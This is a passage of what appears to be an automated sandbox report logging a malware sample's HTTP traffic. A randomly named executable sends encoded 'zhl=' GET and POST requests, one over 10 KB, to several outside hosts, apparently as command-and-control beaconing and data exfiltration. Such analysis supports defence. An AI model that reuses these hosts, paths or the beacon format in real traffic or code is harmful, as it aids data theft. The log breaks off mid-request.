                                                                            Nov 5, 2024 15:23:25.565282106 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div> </div> </div>
                                                                            Nov 5, 2024 15:23:25.565293074 CET1236INData Raw: 66 61 64 65 49 6e 22 20 64 61 74 61 2d 77 6f 77 2d 64 65 6c 61 79 3d 22 30 2e 31 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79 2d 35 22 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: fadeIn" data-wow-delay="0.1s"> <div class="container py-5"> <div class="row g-5"> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Get In Touch</h5>
                                                                            Nov 5, 2024 15:23:25.565304995 CET1236INData Raw: 69 6e 6b 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 69 6e 6b 20 74 65 78 74 2d 77 68 69 74 65 2d 35 30 22 20 68 72 65 66 3d 22 22 3e 41
                                                                            Data Ascii: inks</h5> <a class="btn btn-link text-white-50" href="">About Us</a> <a class="btn btn-link text-white-50" href="">Contact Us</a> <a class="btn btn-link text-white-50"
                                                                            Nov 5, 2024 15:23:25.566135883 CET848INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-4.jpg" alt=""> </div> <div class="co
                                                                            Nov 5, 2024 15:23:25.569329023 CET1236INData Raw: 72 20 65 73 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 6d 78 2d 61 75 74 6f 22 20 73 74 79 6c 65 3d 22
                                                                            Data Ascii: r est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-control bg-transparent w-100 py-3 ps-4 pe-5" type="text" placeholder="Your email">


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 55609 | Destination IP: 209.74.95.29 | Destination Port: 80 | PID: 4324 | Process: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe

Timestamp: Nov 5, 2024 15:23:27.431590080 CET | Bytes transferred: 537 | Direction: OUT
GET /frpa/?X8Rx1=znhhIbB8nN&zhl=24K/DZkmoc7bHzW+Clhod14EO+WVCLplL8BuA7PGHf8qDHCdDnlgU8fv6Zi4ouLCHtMfxhN5psYeEWHEa5SDdP5UtNzqgNLmQXsJ8/qLKwWQm26aR0vbL2E= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.onemart.site
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Timestamp: Nov 5, 2024 15:23:28.155177116 CET | Bytes transferred: 1236 | Direction: IN
HTTP/1.1 404 Not Found
Date: Tue, 05 Nov 2024 14:23:28 GMT
Server: Apache
Content-Length: 13928
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
Timestamp: Nov 5, 2024 15:23:28.155280113 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: arousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><bod
Timestamp: Nov 5, 2024 15:23:28.155294895 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: akaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button
Timestamp: Nov 5, 2024 15:23:28.155759096 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: <a href="#" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-ite
Timestamp: Nov 5, 2024 15:23:28.155771017 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: #">Home</a></li> <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-current="page">404 Error</li> </ol>
Timestamp: Nov 5, 2024 15:23:28.155790091 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: <option value="1">Property Type 1</option> <option value="2">Property Type 2</option> <option value="3">Property Type 3</option>
Timestamp: Nov 5, 2024 15:23:28.156426907 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: .1s"> <div class="container text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary">
Timestamp: Nov 5, 2024 15:23:28.156440020 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: <p class="mb-2"><i class="fa fa-phone-alt me-3"></i>+012 345 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2">
Timestamp: Nov 5, 2024 15:23:28.156456947 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: <a class="btn btn-link text-white-50" href="">Terms & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5>
Timestamp: Nov 5, 2024 15:23:28.157272100 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-6.jpg" alt=""> </div> <
Timestamp: Nov 5, 2024 15:23:28.162250996 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: </a>, All Right Reserved. .../*** This template is free as long as you keep the footer authors credit link/attribution link/backlink. If you'd like to use the template without the footer authors credit link/attribution


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 55644 | Destination IP: 136.143.186.12 | Destination Port: 80 | PID: 4324 | Process: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe

Timestamp: Nov 5, 2024 15:23:33.592297077 CET | Bytes transferred: 799 | Direction: OUT
POST /tpid/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.lanxuanz.tech
Origin: http://www.lanxuanz.tech
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Referer: http://www.lanxuanz.tech/tpid/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: zhl=TlINkFTdlngQStN+xjVU97X5LGH/MCjetDp52utF1Q+87OkXsqYxVqzSlInwuHkpDHwAbqBO5MVQRzEdhWlJIsbKhz3YiiTWZ+CQ+8Qs7A5GPfNtJ1HATxITgVorLv6uzTZCdZ9Cfcb5rnNzdve6grPSyeHXsEVtMH4mNslxARVQCI7zk1YgpmE2HzRZsvwbWA==

Timestamp: Nov 5, 2024 15:23:34.284486055 CET | Bytes transferred: 1236 | Direction: IN
HTTP/1.1 404
Server: ZGS
Date: Tue, 05 Nov 2024 14:23:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
Set-Cookie: csrfc=2c4ef1fb-bf6a-4674-b20c-13e13d83c5d4;path=/;priority=high
Set-Cookie: _zcsr_tmp=2c4ef1fb-bf6a-4674-b20c-13e13d83c5d4;path=/;SameSite=Strict;priority=high
Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
vary: accept-encoding
Content-Encoding: gzip
Data Ascii: (binary gzip-encoded chunked body, not printable)
Timestamp: Nov 5, 2024 15:23:34.284665108 CET | Bytes transferred: 729 | Direction: IN
Data Ascii: (binary gzip-encoded chunked body, not printable)


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.455659136.143.186.12804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:36.140371084 CET819OUTPOST /tpid/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.lanxuanz.tech
                                                                            Origin: http://www.lanxuanz.tech
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.lanxuanz.tech/tpid/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 54 6c 49 4e 6b 46 54 64 6c 6e 67 51 53 4e 64 2b 32 41 4e 55 37 62 58 36 56 57 48 2f 46 69 69 5a 74 43 56 35 32 73 42 56 30 6a 61 38 37 71 73 58 72 72 59 78 63 36 7a 53 76 6f 6d 37 77 33 6b 67 44 41 35 2f 62 75 42 4f 35 4d 42 51 52 79 30 64 68 42 35 4b 4f 38 62 49 36 6a 33 57 73 43 54 57 5a 2b 43 51 2b 34 78 35 37 45 56 47 50 73 46 74 59 6b 48 48 51 78 49 51 77 46 6f 72 63 66 36 69 7a 54 5a 61 64 59 67 66 66 66 6a 35 72 69 78 7a 64 2b 65 37 75 72 4f 34 2f 2b 47 58 67 55 45 41 4b 45 63 75 46 65 30 56 4f 7a 56 55 4f 75 71 70 31 45 35 33 37 6d 67 46 61 30 59 74 68 73 4e 53 4e 47 54 48 56 54 46 37 69 41 62 37 51 33 55 77 58 41 43 79 2f 59 30 3d
                                                                            Data Ascii: zhl=TlINkFTdlngQSNd+2ANU7bX6VWH/FiiZtCV52sBV0ja87qsXrrYxc6zSvom7w3kgDA5/buBO5MBQRy0dhB5KO8bI6j3WsCTWZ+CQ+4x57EVGPsFtYkHHQxIQwForcf6izTZadYgfffj5rixzd+e7urO4/+GXgUEAKEcuFe0VOzVUOuqp1E537mgFa0YthsNSNGTHVTF7iAb7Q3UwXACy/Y0=
Nov 5, 2024 15:23:36.827424049 CET | 1236 | IN | HTTP/1.1 404
                                                                            Server: ZGS
                                                                            Date: Tue, 05 Nov 2024 14:23:36 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
                                                                            Set-Cookie: csrfc=9780d1fe-a7d0-463a-9859-349853744ce5;path=/;priority=high
                                                                            Set-Cookie: _zcsr_tmp=9780d1fe-a7d0-463a-9859-349853744ce5;path=/;SameSite=Strict;priority=high
                                                                            Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                            vary: accept-encoding
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                            Data Ascii: 575X[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
Nov 5, 2024 15:23:36.827519894 CET | 729 | IN | Data Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                            Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 55674 | 136.143.186.128 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:23:38.686458111 CET | 10901 | OUT | POST /tpid/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.lanxuanz.tech
                                                                            Origin: http://www.lanxuanz.tech
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.lanxuanz.tech/tpid/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 54 6c 49 4e 6b 46 54 64 6c 6e 67 51 53 4e 64 2b 32 41 4e 55 37 62 58 36 56 57 48 2f 46 69 69 5a 74 43 56 35 32 73 42 56 30 6a 53 38 37 64 73 58 72 4d 45 78 47 36 7a 53 6a 49 6e 38 77 33 6c 67 44 42 64 7a 62 75 46 42 35 50 35 51 52 51 38 64 77 6c 4e 4b 41 38 62 49 7a 44 33 62 69 69 53 4d 5a 34 69 63 2b 38 56 35 37 45 56 47 50 71 68 74 59 31 48 48 57 78 49 54 67 56 6f 76 4c 76 37 31 7a 58 4e 6b 64 59 6b 50 66 75 44 35 71 43 42 7a 4f 63 6d 37 6d 72 50 65 38 2b 47 35 67 55 49 44 4b 45 42 56 46 66 78 77 4f 78 4a 55 59 49 44 66 69 41 74 63 67 58 77 2b 47 44 34 7a 69 65 64 49 55 6e 6e 74 63 78 39 66 67 30 58 59 4e 6c 35 6a 46 6c 57 71 69 63 78 31 76 53 66 74 48 54 38 53 5a 62 76 70 41 74 44 67 4e 62 6b 56 46 4d 44 77 68 43 37 4c 75 56 33 55 47 79 2f 4e 36 2f 71 42 77 6b 59 31 30 4b 59 6e 45 34 69 76 2b 49 62 6e 4e 30 46 70 53 75 75 50 77 31 30 74 6b 6b 46 4d 53 6a 2f 48 6f 4a 6b 6a 67 63 61 63 75 6c 39 52 6f 2f 33 77 46 71 34 47 30 49 4e 2b 6f 32 58 62 6e 44 42 6d 43 47 4f 69 51 4a 61 4a 53 77 [TRUNCATED]
                                                                            Data Ascii: zhl=TlINkFTdlngQSNd+2ANU7bX6VWH/FiiZtCV52sBV0jS87dsXrMExG6zSjIn8w3lgDBdzbuFB5P5QRQ8dwlNKA8bIzD3biiSMZ4ic+8V57EVGPqhtY1HHWxITgVovLv71zXNkdYkPfuD5qCBzOcm7mrPe8+G5gUIDKEBVFfxwOxJUYIDfiAtcgXw+GD4ziedIUnntcx9fg0XYNl5jFlWqicx1vSftHT8SZbvpAtDgNbkVFMDwhC7LuV3UGy/N6/qBwkY10KYnE4iv+IbnN0FpSuuPw10tkkFMSj/HoJkjgcacul9Ro/3wFq4G0IN+o2XbnDBmCGOiQJaJSw9MAVBwR7fXSIf/+797udDTKpQ2cQj1X9EflQIeXyhAGM38FhelxC5BhlK2RjHbeDDRm2HOCpepgpqYhQ93PEl1nEZX9MZdVGSTwHaHplVitT5MKEi8sZyVhhX1ZU75s1l06Pl4pQudCLsCNMwoX93QajvlB2NFJTnqNsL1n0oJHjRpWhdEM+YgaYQJkZrjcAYJQIJ7B60zwlqfETRIMgkU0O4boXyZqpJBCRzZ5uujtuBNB64Oh07hRtZ0/VSHGPw/aQWouH4kPuFPKX0SGAnmff8RhryrwlrvjQVTSrXHvAJetj63ZfJX/d1i4VIsskYBo/UR+VWHErS1u3c2BKat3BNyIjlnoxrIi6gFg369/tY8XlHqgrUbOiGdvIXFCUtET76M9n7ZBMMCiaynC+pRksqy9nYT0Fjpj720sxGZOMriPswKnXjaEwMAQ4Tx2iLJ8RfBxqhS62yuFtitGL1nA9DoYkGGLGIhZg7da7XUrz71b3fYHruT/arH1gMOtu67TE/Fs/Zk5hVREoxDHuMj84s6ZHilmXmEw+Y1tWxUvoERN8IVzBk8rREzObrgI976z4Z0SyHzOHzM1TXoEzwBn9KhAaLx3KCRJuvjgBZ4slM/52qONrQCiu8baNKp8XeYtVINyrJ+a9hK6GwOxDBZvFrOgczILzUZ [TRUNCATED]
Nov 5, 2024 15:23:39.363715887 CET | 549 | IN | HTTP/1.1 400
                                                                            Server: ZGS
                                                                            Date: Tue, 05 Nov 2024 14:23:39 GMT
                                                                            Content-Type: text/html;charset=ISO-8859-1
                                                                            Content-Length: 80
                                                                            Connection: close
                                                                            Set-Cookie: zalb_8ae64e9492=4f8d155d92baa51fc002217e6d409cd9; Path=/
                                                                            Set-Cookie: csrfc=07eae607-9156-47e8-9858-eaa4689a5da1;path=/;priority=high
                                                                            Set-Cookie: _zcsr_tmp=07eae607-9156-47e8-9858-eaa4689a5da1;path=/;SameSite=Strict;priority=high
                                                                            Set-Cookie: JSESSIONID=18168AA369B9EDA86F788F446CB4FB65; Path=/; HttpOnly
                                                                            Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a
                                                                            Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 55686 | 136.143.186.128 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:23:41.230813980 CET | 538 | OUT | GET /tpid/?zhl=engtnyTNtTQDWNNE7yJ78I7feV66GlGe8mJE780+4T661tYAjJ0+Tu/RlOqq0mFfSRMDbaNY7odrQC55001RANar5S3nmyGvU4LO7et061dPBL96f2mSZAk=&X8Rx1=znhhIbB8nN HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.lanxuanz.tech
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 5, 2024 15:23:41.940274954 CET | 1236 | IN | HTTP/1.1 404
                                                                            Server: ZGS
                                                                            Date: Tue, 05 Nov 2024 14:23:41 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 4641
                                                                            Connection: close
                                                                            Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
                                                                            Set-Cookie: csrfc=864dc8b1-6db8-4994-a727-64d630b9063c;path=/;priority=high
                                                                            Set-Cookie: _zcsr_tmp=864dc8b1-6db8-4994-a727-64d630b9063c;path=/;SameSite=Strict;priority=high
                                                                            Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                            vary: accept-encoding
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50
Nov 5, 2024 15:23:41.940345049 CET | 212 | IN | Data Raw: 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a
                                                                            Data Ascii: %, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; }
Nov 5, 2024 15:23:41.940356016 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 2e 6c 6f 67 6f 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 31 38 70 78 20 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a
                                                                            Data Ascii: .logo{ margin-top:3px; padding:18px 0px; } .content{ background-color:#fff; border-radius:4px; border-left:1px solid #e9e9e9; border-right:1px soli
Nov 5, 2024 15:23:41.940645933 CET | 1236 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 2d 69 6e
                                                                            Data Ascii: .domain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0; list-style:no
Nov 5, 2024 15:23:41.940660000 CET | 1236 | IN | Data Raw: 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 43 6f 6c 6f 72 73 22
                                                                            Data Ascii: ative; } </style> </head> <body> <div class="topColors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div>
Nov 5, 2024 15:23:41.940670967 CET | 11 | IN | Data Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: y></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 55722 | 133.130.35.90 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:23:47.544778109 CET | 793 | OUT | POST /8r0w/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
